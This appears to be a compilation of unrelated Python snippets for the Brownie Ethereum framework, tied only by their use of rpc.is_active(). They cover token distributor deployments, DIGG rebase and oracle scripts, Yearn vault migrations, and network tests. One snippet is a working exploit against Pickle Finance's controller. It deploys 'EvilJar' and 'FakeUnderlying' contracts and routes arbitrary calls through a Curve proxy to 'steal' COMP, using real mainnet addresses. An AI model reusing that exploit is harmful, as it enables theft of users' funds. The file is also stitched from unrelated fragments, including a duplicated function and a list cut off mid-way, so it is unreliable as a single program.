def deploy(): user = accounts[0] if rpc.is_active() else accounts.load( input('account: ')) tree = json.load(open('snapshot/07-merkle-distribution.json')) root = tree['merkleRoot'] token = str(DAI) MerkleDistributor.deploy(token, root, {'from': user})
def rebase(badger: BadgerSystem, account): digg = badger.digg supplyBefore = digg.token.totalSupply() print("spfBefore", digg.token._sharesPerFragment()) print("supplyBefore", digg.token.totalSupply()) print(digg.cpiMedianOracle.getData.call()) sushi = SushiswapSystem() pair = sushi.getPair(digg.token, registry.tokens.wbtc) uni = UniswapSystem() uniPair = uni.getPair(digg.token, registry.tokens.wbtc) last_rebase_time = digg.uFragmentsPolicy.lastRebaseTimestampSec() min_rebase_time = digg.uFragmentsPolicy.minRebaseTimeIntervalSec() in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow() now = chain.time() time_since_last_rebase = now - last_rebase_time min_time_passed = (last_rebase_time + min_rebase_time) < now console.print({ "last_rebase_time": last_rebase_time, "in_rebase_window": in_rebase_window, "now": now, "time_since_last_rebase": time_since_last_rebase, "min_time_passed": min_time_passed, }) # Rebase if sufficient time has passed since last rebase and we are in the window. # Give adequate time between TX attempts if time_since_last_rebase > hours( 2) and in_rebase_window and min_time_passed: console.print( "[bold yellow]===== 📈 Rebase! 📉=====[/bold yellow]") print("pair before", pair.getReserves()) print("uniPair before", uniPair.getReserves()) tx_timer.start_timer(account, "Rebase") tx = digg.orchestrator.rebase({"from": account}) tx_timer.end_timer() if rpc.is_active(): chain.mine() print(tx.call_trace()) print(tx.events) supplyAfter = digg.token.totalSupply() print("spfAfter", digg.token._sharesPerFragment()) print("supplyAfter", supplyAfter) print("supplyChange", supplyAfter / supplyBefore) print("supplyChangeOtherWay", supplyBefore / supplyAfter) print("pair after", pair.getReserves()) print("uniPair after", uniPair.getReserves()) else: console.print("[white]===== No Rebase =====[/white]")
def get_user(): if rpc.is_active(): return accounts.at("0x1A6224b5ADe2C6d52d75F5d8b82197bbc61007ee", force=True) else: print("Available accounts:", accounts.load()) return accounts.load(input("account: "))
def get_user(): if rpc.is_active(): return accounts.at("0x751B640E0AbE005548286B5e15353Edc996DE1cb", force=True) else: print("Available accounts:", accounts.load()) return accounts.load(input("account: "))
def get_user(): if rpc.is_active(): return accounts.at("0x5E38b802525de11A54506801B296D2Aa93d033EF", force=True) else: return accounts.load( click.prompt("Account", type=click.Choice(accounts.load())) )
def test_disconnect(): network.disconnect() assert not network.is_connected() assert network.show_active() is None assert not rpc.is_active() assert not web3.isConnected() with pytest.raises(ConnectionError): network.disconnect()
def main(): tree = json.load(open("snapshot/02-merkle.json")) user = accounts[0] if rpc.is_active() else accounts.load( input("account: ")) pytho = Pytho.deploy("Pytho", "PYTHO", tree["tokenTotal"], {"from": user}) distributor = MerkleDistributor.deploy(pytho, tree["merkleRoot"], {"from": user}) pytho.transfer(distributor, pytho.balanceOf(user))
def main(): tree = json.load(open("snapshot/02-merkle.json")) user = accounts[0] if rpc.is_active() else accounts.load(input("account: ")) root = tree["merkleRoot"] percentIOU = PercentIOU.deploy( "Percent IOU", "PIOU", tree["tokenTotal"], {"from": user} ) distributor = MerkleDistributor.deploy(percentIOU, root, {"from": user}) percentIOU.transfer(distributor, percentIOU.balanceOf(user))
def main(): tree = json.load(open("snapshot/04-merkle.json")) user = accounts[0] if rpc.is_active() else accounts.load(input("account: ")) root = tree["merkleRoot"] cornichon = Cornichon.deploy( "Cornichon", "CORN", tree["tokenTotal"], {"from": user} ) distributor = MerkleDistributor.deploy(cornichon, root, {"from": user}) cornichon.transfer(distributor, cornichon.balanceOf(user))
def harvest(): assert rpc.is_active() andre = accounts.at("andrecronje.eth", force=True) print(andre) governance = web3.ens.resolve("ychad.eth") registry = load_registry() vaults = load_vaults(registry) for v in vaults: secho(v.name, fg="green") print(v) try: tx = v.strategy.harvest({"from": andre}) tx.info() except AttributeError: pass
def migrate(): assert rpc.is_active() vault = Vault.at(get_address("vault")) gov = accounts.at(vault.governance(), force=True) old_strategy = StrategyBalancerLP.at(get_address("old strategy")) new_strategy = StrategyBalancerLP.deploy(vault, {"from": gov}) print("pricePerShare", vault.pricePerShare().to("ether")) print("estimatedTotalAssets", old_strategy.estimatedTotalAssets().to("ether")) vault.migrateStrategy(old_strategy, new_strategy, {"from": gov}) print("pricePerShare", vault.pricePerShare().to("ether")) print("estimatedTotalAssets", new_strategy.estimatedTotalAssets().to("ether")) keeper = accounts.at(new_strategy.keeper(), force=True) for i in range(2): new_strategy.harvest({"from": keeper}) print("pricePerShare", vault.pricePerShare().to("ether")) print("estimatedTotalAssets", new_strategy.estimatedTotalAssets().to("ether"))
def migrate(): assert rpc.is_active() vault = Vault.at(get_address('vault')) gov = accounts.at(vault.governance(), force=True) old_strategy = StrategyUniswapPairPickle.at(get_address('old strategy')) new_strategy = StrategyUniswapPairPickle.deploy(vault, old_strategy.jar(), old_strategy.pid(), {'from': gov}) print('pricePerShare', vault.pricePerShare().to('ether')) print('estimatedTotalAssets', old_strategy.estimatedTotalAssets().to('ether')) vault.migrateStrategy(old_strategy, new_strategy, {'from': gov}) print('pricePerShare', vault.pricePerShare().to('ether')) print('estimatedTotalAssets', new_strategy.estimatedTotalAssets().to('ether')) keeper = accounts.at(new_strategy.keeper(), force=True) for i in range(2): new_strategy.harvest({'from': keeper}) print('pricePerShare', vault.pricePerShare().to('ether')) print('estimatedTotalAssets', new_strategy.estimatedTotalAssets().to('ether'))
def main(): user = ( accounts[-1] if rpc.is_active() else accounts.load(input("brownie account: ")) ) recycle = Recycle.at("0x3f1C19b09b474f7b7a8B09488Fc8648b278930cc") dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F") usdc = interface.ERC20("0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48") usdt = interface.USDT("0xdAC17F958D2ee523a2206206994597C13D831ec7") token3crv = interface.ERC20("0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490") y3crv = interface.ERC20("0x9cA85572E6A3EbF24dEDd195623F188735A5179f") coins = [dai, usdc, usdt, y3crv] symbols = {token3crv: "3CRV", y3crv: "y3CRV"} balances = { symbols.get(coin, coin.symbol()): coin.balanceOf(user) / 10 ** coin.decimals() for coin in coins } balances = {name: balance for name, balance in balances.items() if balance > 0} print(f"Recycling...") for coin, balance in balances.items(): print(f" {coin} = {balance}") if not click.confirm("Continue?"): return for coin in coins: if coin.balanceOf(user) > coin.allowance(user, recycle): print(f"Approving {coin.name()}") coin.approve(recycle, 2 ** 256 - 1, {"from": user}) tx = recycle.recycle({"from": user}) print( "Got", tx.events["Recycled"]["received_y3crv"] / 10 ** y3crv.decimals(), "y3CRV" )
def main(): if rpc.is_active(): sender = accounts[0] else: priv = os.environ.get('VAULT_KEEPER_PRIV') sender = accounts.add(priv) if priv else accounts.load( input('brownie account: ')) table = [] vaults = [] for data in vault_data: if data['name'] in skipped: print('aLINK not supported yet') continue token = interface.ERC20(data['erc20address']) vault = interface.YearnVault(data['vaultContractAddress']) decimals = token.decimals() available = vault.available() balance = vault.balance() ratio = 1 - vault.min() / vault.max() can_earn = available / balance > ratio if balance > 0 else False if can_earn: vaults.append(data['vaultContractAddress']) table.append([ data['name'], available / 10**decimals, balance / 10**decimals, can_earn ]) print(tabulate(table, headers=['name', 'available', 'balance', 'can_earn'])) if vaults: print('poking these vaults:', vaults) keeper.earn(vaults, {'from': sender, 'gas_limit': 2_500_000}) else: print('no vaults to poke, exiting')
def main(): assert rpc.is_active() hacker = accounts[0] controller = interface.ControllerV4( "0x6847259b2B3A4c17e7c43C54409810aF48bA5210") dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F") cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643") comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888") curve_proxy_logic = interface.CurveProxyLogic( "0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8") jar = interface.PickleJar(controller.jars(dai)) strategy = interface.Strategy(controller.strategies(dai)) print("jar", jar) print("strategy", strategy) steal = comp evil_jar = EvilJar.deploy(steal, {"from": hacker}) fake_underlying = FakeUnderlying.deploy(steal, {"from": hacker}) contracts = { "controller": controller, "strategy": strategy, "dai jar": jar, "evil jar": evil_jar, "fake underlying": fake_underlying, "hacker": hacker, } def status(): data = [] for name, c in contracts.items(): data.append([ name, dai.balanceOf(c).to("ether"), cdai.balanceOf(c) / 1e8, comp.balanceOf(c) / 1e18, ]) print(tabulate(data, headers=["contract", "dai", "cdai", "comp"])) status() def arbitrary_call(to, sig, param=None): param = steal if param is None else fake_underlying return curve_proxy_logic.add_liquidity.encode_input( to, sig[:10], 1, 0, param, ) earns = 3 datas = ([arbitrary_call(strategy, strategy.withdrawAll.encode_input())] + [arbitrary_call(jar, jar.earn.encode_input())] * earns + [ arbitrary_call( strategy, strategy.withdraw["address"].encode_input(steal), True) ]) targets = [curve_proxy_logic for _ in datas] tx = controller.swapExactJarForJar( evil_jar, evil_jar, 0, 0, targets, datas, {"from": hacker}, ) status()
def test_connect(): network.connect() assert network.is_connected() assert network.show_active() == "development" assert rpc.is_active() assert web3.isConnected()
def is_forknet(self): return rpc.is_active()
def main(): """ Connect to badger system, and configure multisig for running transactions in local fork without access to accounts """ # Connect badger system from file badger = connect_badger() digg = badger.digg # Sanity check file addresses expectedMultisig = "0xB65cef03b9B89f99517643226d76e286ee999e77" assert badger.devMultisig == expectedMultisig if rpc.is_active(): distribute_test_ether(badger.devMultisig, Wei("5 ether")) # Multisig wrapper # Get price data from sushiswap, uniswap, and coingecko digg_usd_coingecko = 41531.72 btc_usd_coingecko = 32601.13 digg_per_btc = digg_usd_coingecko / btc_usd_coingecko uniTWAP = get_average_daily_price("scripts/oracle/data/uni_digg_hour") sushiTWAP = get_average_daily_price("scripts/oracle/data/sushi_digg_hour") averageTWAP = Average([uniTWAP, sushiTWAP]) console.print({ "uniTWAP": uniTWAP, "sushiTWAP": sushiTWAP, "averageTWAP": averageTWAP }) supplyBefore = digg.token.totalSupply() print("spfBefore", digg.token._sharesPerFragment()) print("supplyBefore", digg.token.totalSupply()) marketValue = Wei(str(averageTWAP) + " ether") print(marketValue) print(int(marketValue * 10**18)) print("digg_per_btc", digg_per_btc, averageTWAP, marketValue) if rpc.is_active(): distribute_test_ether(digg.centralizedOracle, Wei("5 ether")) centralizedMulti = GnosisSafe(digg.centralizedOracle) print(digg.marketMedianOracle.providerReports(digg.centralizedOracle, 0)) print(digg.marketMedianOracle.providerReports(digg.centralizedOracle, 1)) print(digg.cpiMedianOracle.providerReports(digg.constantOracle, 0)) print(digg.cpiMedianOracle.providerReports(digg.constantOracle, 1)) print(digg.cpiMedianOracle.getData.call()) sushi = SushiswapSystem() pair = sushi.getPair(digg.token, registry.tokens.wbtc) uni = UniswapSystem() uniPair = uni.getPair(digg.token, registry.tokens.wbtc) print("pair before", pair.getReserves()) print("uniPair before", uniPair.getReserves()) tx = centralizedMulti.execute( MultisigTxMetadata(description="Set Market Data"), { "to": digg.marketMedianOracle.address, "data": digg.marketMedianOracle.pushReport.encode_input(marketValue), }, ) chain.mine() print(tx.call_trace()) print(tx.events) chain.sleep(hours(0.4)) chain.mine() in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow() while not in_rebase_window: print("Not in rebase window...") chain.sleep(hours(0.1)) chain.mine() in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow() tx = digg.orchestrator.rebase({"from": accounts[0]}) chain.mine() supplyAfter = digg.token.totalSupply() print("spfAfter", digg.token._sharesPerFragment()) print("supplyAfter", supplyAfter) print("supplyChange", supplyAfter / supplyBefore) print("supplyChangeOtherWay", supplyBefore / supplyAfter) print("pair after", pair.getReserves()) print("uniPair after", uniPair.getReserves())
def test_attach(no_rpc): rpc._rpc = None rpc.attach("http://127.0.0.1:31337") rpc._rpc = None rpc.attach(("127.0.0.1", 31337)) assert rpc.is_active()
{ # Advisors with unknown addresses "admin": "0x39415255619783A2E71fcF7d8f708A951d92e1b6", # Curve "amount": 14_016820183895092715910255, }, { # Rest of employee coins "admin": "0x39415255619783A2E71fcF7d8f708A951d92e1b6", # Curve "amount": 26_666666666046511627906979, }, { # Community fund "admin": "0x000000000000000000000000000000000000dead", # set to DAO XXX "amount": 151_515151511627906976744186, }, ] def get_live_admin(): # Admin and funding admin account objects used for in a live environment # May be created via accounts.load(name) or accounts.add(privkey) # https://eth-brownie.readthedocs.io/en/stable/account-management.html admin = None # funding_admins = [None, None, None, None] return admin, funding_admins if not rpc.is_active(): # logic that only executes in a live environment web3.eth.setGasPriceStrategy(gas_strategy) web3.middleware_onion.add(middleware.time_based_cache_middleware) web3.middleware_onion.add(middleware.latest_block_based_cache_middleware) web3.middleware_onion.add(middleware.simple_cache_middleware)
def test_launch(no_rpc): assert not rpc.is_active() assert not rpc.is_child() rpc.launch("ganache-cli") assert rpc.is_active() assert rpc.is_child()